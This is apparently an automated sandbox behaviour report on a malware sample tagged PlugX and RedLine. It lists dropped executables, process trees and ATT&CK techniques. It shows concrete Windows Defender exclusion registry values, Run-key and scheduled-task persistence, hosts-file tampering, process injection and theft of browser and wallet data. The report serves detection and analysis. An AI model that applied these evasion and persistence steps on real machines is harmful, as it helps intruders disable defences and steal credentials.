plugx | 65fa93616cdb8c92a541dd2ad8468d6688e1b1f2606891b56db3e90fbfc9acbd

PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
trojan plugx
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Blocklisted process makes network request 64 IoCs

Processes:

MsiExec.exe

flow	pid	process
119	2412	MsiExec.exe
121	2412	MsiExec.exe
122	2412	MsiExec.exe
124	2412	MsiExec.exe
126	2412	MsiExec.exe
129	2412	MsiExec.exe
131	2412	MsiExec.exe
132	2412	MsiExec.exe
133	2412	MsiExec.exe
134	2412	MsiExec.exe
135	2412	MsiExec.exe
136	2412	MsiExec.exe
137	2412	MsiExec.exe
138	2412	MsiExec.exe
139	2412	MsiExec.exe
140	2412	MsiExec.exe
141	2412	MsiExec.exe
142	2412	MsiExec.exe
143	2412	MsiExec.exe
144	2412	MsiExec.exe
145	2412	MsiExec.exe
146	2412	MsiExec.exe
147	2412	MsiExec.exe
148	2412	MsiExec.exe
149	2412	MsiExec.exe
150	2412	MsiExec.exe
151	2412	MsiExec.exe
152	2412	MsiExec.exe
153	2412	MsiExec.exe
154	2412	MsiExec.exe
155	2412	MsiExec.exe
156	2412	MsiExec.exe
157	2412	MsiExec.exe
158	2412	MsiExec.exe
159	2412	MsiExec.exe
160	2412	MsiExec.exe
161	2412	MsiExec.exe
162	2412	MsiExec.exe
163	2412	MsiExec.exe
164	2412	MsiExec.exe
165	2412	MsiExec.exe
166	2412	MsiExec.exe
167	2412	MsiExec.exe
168	2412	MsiExec.exe
169	2412	MsiExec.exe
170	2412	MsiExec.exe
171	2412	MsiExec.exe
172	2412	MsiExec.exe
173	2412	MsiExec.exe
174	2412	MsiExec.exe
175	2412	MsiExec.exe
176	2412	MsiExec.exe
177	2412	MsiExec.exe
178	2412	MsiExec.exe
179	2412	MsiExec.exe
180	2412	MsiExec.exe
181	2412	MsiExec.exe
182	2412	MsiExec.exe
183	2412	MsiExec.exe
184	2412	MsiExec.exe
185	2412	MsiExec.exe
186	2412	MsiExec.exe
187	2412	MsiExec.exe
188	2412	MsiExec.exe

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

Ultra.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts Ultra.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Ultra.exe

Executes dropped EXE 39 IoCs

Processes:

Install.tmpUltra.exeultramediaburner.exeultramediaburner.tmpZHarenujezhi.exeLaniriradi.exeUltraMediaBurner.exeKiffMainE1.exe001.exeinstaller.exegpooe.exejfiag3g_gg.exegoogle-game.exejfiag3g_gg.exehuesaa.exejfiag3g_gg.exeaskinstall39.exesetup.exeSetup_v3.exe005.exeFessura.exe.comSunLabsPlayer.exejfiag3g_gg.exeFessura.exe.comRegAsm.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.execonhost.exedata_load.exelighteningplayer-cache-gen.exejfiag3g_gg.exejfiag3g_gg.exejfiag3g_gg.exejfiag3g_gg.exeAdvancedWindowsManager.exe

pid	process
2024	Install.tmp
1776	Ultra.exe
1032	ultramediaburner.exe
1932	ultramediaburner.tmp
748	ZHarenujezhi.exe
1432	Laniriradi.exe
564	UltraMediaBurner.exe
3600	KiffMainE1.exe
3768	001.exe
112	installer.exe
2212	gpooe.exe
2300	jfiag3g_gg.exe
2976	google-game.exe
3100	jfiag3g_gg.exe
3200	huesaa.exe
3292	jfiag3g_gg.exe
3496	askinstall39.exe
3332	setup.exe
3756	Setup_v3.exe
908	005.exe
2208	Fessura.exe.com
2308	SunLabsPlayer.exe
2452	jfiag3g_gg.exe
3508	Fessura.exe.com
3748	RegAsm.exe
3008	AdvancedWindowsManager.exe
3372	AdvancedWindowsManager.exe
3504	AdvancedWindowsManager.exe
2764	AdvancedWindowsManager.exe
5252	AdvancedWindowsManager.exe
5656	AdvancedWindowsManager.exe
7564	conhost.exe
7596	data_load.exe
7572	lighteningplayer-cache-gen.exe
7876	jfiag3g_gg.exe
8068	jfiag3g_gg.exe
7612	jfiag3g_gg.exe
2384	jfiag3g_gg.exe
8040	AdvancedWindowsManager.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Loads dropped DLL 64 IoCs

Processes:

Install.exeInstall.tmpultramediaburner.exeultramediaburner.tmpinstaller.exegpooe.exeMsiExec.exehuesaa.execmd.exeSunLabsPlayer.exeMsiExec.exeMsiExec.exeFessura.exe.comFessura.exe.comRegAsm.exetaskeng.exe

pid	process
1628	Install.exe
2024	Install.tmp
2024	Install.tmp
2024	Install.tmp
2024	Install.tmp
1032	ultramediaburner.exe
1932	ultramediaburner.tmp
1932	ultramediaburner.tmp
1932	ultramediaburner.tmp
1932	ultramediaburner.tmp
1932	ultramediaburner.tmp
1932	ultramediaburner.tmp
112	installer.exe
112	installer.exe
2212	gpooe.exe
2212	gpooe.exe
112	installer.exe
2212	gpooe.exe
2212	gpooe.exe
2844	MsiExec.exe
3200	huesaa.exe
3200	huesaa.exe
2844	MsiExec.exe
2064	cmd.exe
2308	SunLabsPlayer.exe
3200	huesaa.exe
3200	huesaa.exe
2412	MsiExec.exe
2412	MsiExec.exe
2412	MsiExec.exe
2412	MsiExec.exe
2412	MsiExec.exe
2308	SunLabsPlayer.exe
2412	MsiExec.exe
2412	MsiExec.exe
2412	MsiExec.exe
2412	MsiExec.exe
112	installer.exe
2412	MsiExec.exe
2412	MsiExec.exe
2412	MsiExec.exe
3128	MsiExec.exe
3128	MsiExec.exe
3128	MsiExec.exe
3128	MsiExec.exe
3128	MsiExec.exe
3128	MsiExec.exe
2208	Fessura.exe.com
3128	MsiExec.exe
2412	MsiExec.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
3508	Fessura.exe.com
3748	RegAsm.exe
1764	taskeng.exe
1764	taskeng.exe
1764	taskeng.exe
3512

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

rundll32.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NXfSHgjpzLhX = "0"	rundll32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0"	rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Ultra.exegpooe.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Vaesaeloqite.exe\""	Ultra.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gpooe.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery
T1063

Processes:

powershell.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\KasperskyLab powershell.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\KasperskyLab	powershell.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

installer.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

58 ip-api.com

flow	ioc
58	ip-api.com

Drops file in System32 directory 8 IoCs

Processes:

rundll32.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Fessura.exe.com

description pid process target process

PID 3508 set thread context of 3748 3508 Fessura.exe.com RegAsm.exe

description	pid	process	target process
PID 3508 set thread context of 3748	3508	Fessura.exe.com	RegAsm.exe

Drops file in Program Files directory 64 IoCs

Processes:

SunLabsPlayer.exepowershell.exepowershell.exepowershell.exeUltra.exeultramediaburner.tmp

description	ioc	process
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlccore.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\temp_files	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\index.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\Windows Portable Devices\Vaesaeloqite.exe	Ultra.exe
File created	C:\Program Files (x86)\lighteningplayer\libssp-0.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlc.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\regstr	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Audio-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll	SunLabsPlayer.exe

Drops file in Windows directory 31 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSICC6D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE202.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3EB6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI543A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE58C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI607C.tmp	msiexec.exe
File created	C:\Windows\Installer\f755b88.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8DB2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9E49.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC4BF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID370.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f755b88.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF1EC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6722.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI964C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6EFF.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9283.tmp	msiexec.exe
File created	C:\Windows\Installer\f755b8a.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI58FC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f755b8a.ipi	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\Installer\f755b8c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI73C2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7699.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9B3C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC0B8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4DC4.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3948 schtasks.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

2920 bitsadmin.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2524 taskkill.exe
2672 taskkill.exe

pid	process
3948	schtasks.exe

pid	process
2920	bitsadmin.exe

pid	process
2524	taskkill.exe
2672	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 40 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "327008093"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0ce8169e541d701	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e4500000000002000000000010660000000100002000000032b6a026e4a236fc60cf827c8fdd62b7fc481cc288e5b06ee3b8038612cd9480000000000e8000000002000020000000fcf9dc0eef0371c00b879359996a9e51434bf69d1d44e158f85992364e728d8390000000205e8f48d13df40f7c47028f8c0174cdc9038bf22edb286ad624e195bc313427ec7ac7a5a15ec53b415c05d41bfc905d661c978124cc32c67b0f3a4181b63a8e22f3bd0aa794768551e48d900fc0761ae05b715b2fadc7a71d3719da808f4cdd1dc681ed71b7e4415dd227cc02a94308a605d7df3766554d4f00e4a82e0ed9db31febfcebce4a11a9123a0f819a7180b40000000ddeab70fdb4ba916d02c42ad59de167fd59ed5aa2c9d3917a1295e3ffaa2328f28785053b931ef5bdff204bac7d9ca3b29f2915e5b42fba6568bb7a4d744fbc2	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{85050211-ADD8-11EB-9984-DABA49B2525C} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
